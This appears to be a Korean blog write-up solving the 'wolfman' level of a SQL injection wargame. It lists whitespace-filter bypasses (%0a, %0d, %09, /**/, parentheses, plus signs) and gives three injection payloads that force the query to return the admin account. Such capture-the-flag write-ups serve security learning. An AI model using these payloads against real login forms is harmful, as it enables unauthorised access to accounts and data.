NGA

los.rubiya.kr/wolfman

WARGAME/LOS
2018. 11. 15. 00:34


query 의 결과가 admin 이기만 하면 된다. $_GET['pw'] 에 whitespace 를 필터링 했지만 굳이 없어도 문제는 풀 수 있다. 하지만 필요할 경우를 대비해 알아보자 ^^


whitespace( ) 우회 방법


Line Feed            %0a


Carrage Return     %0d


Comment             /**/    => 1/**/and/**/1


parentheses          ()            (1)and(1)


plus character       +            사실상 whitespace 랑 똑같이 취급됨.


Tab                    %09



풀이


select id from prob_wolfman where id='guest' and pw=''||id='admin'%23


select id from prob_wolfman where id='guest' and pw=''/**/or/**/id='admin'%23


select id from prob_wolfman where id='guest' and pw=''||ord(id)=97%23



ord(id)=97 은 ord("admin") = 'a' 랑 같은 말이다



끄으으읏 


저작자표시

'WARGAME > LOS' 카테고리의 다른 글

los.rubiya.kr/orge  (0) 2018.11.15
los.rubiya.kr/darkelf  (0) 2018.11.15
los.rubiya.kr/orc  (0) 2018.11.15
los.rubiya.kr/goblin  (0) 2018.11.11
los.rubiya.kr/cobolt  (0) 2018.11.11

이 글을 공유합시다

facebook twitter googleplus kakaoTalk kakaostory naver band
'WARGAME/LOS' 의 관련글
댓글

티스토리툴바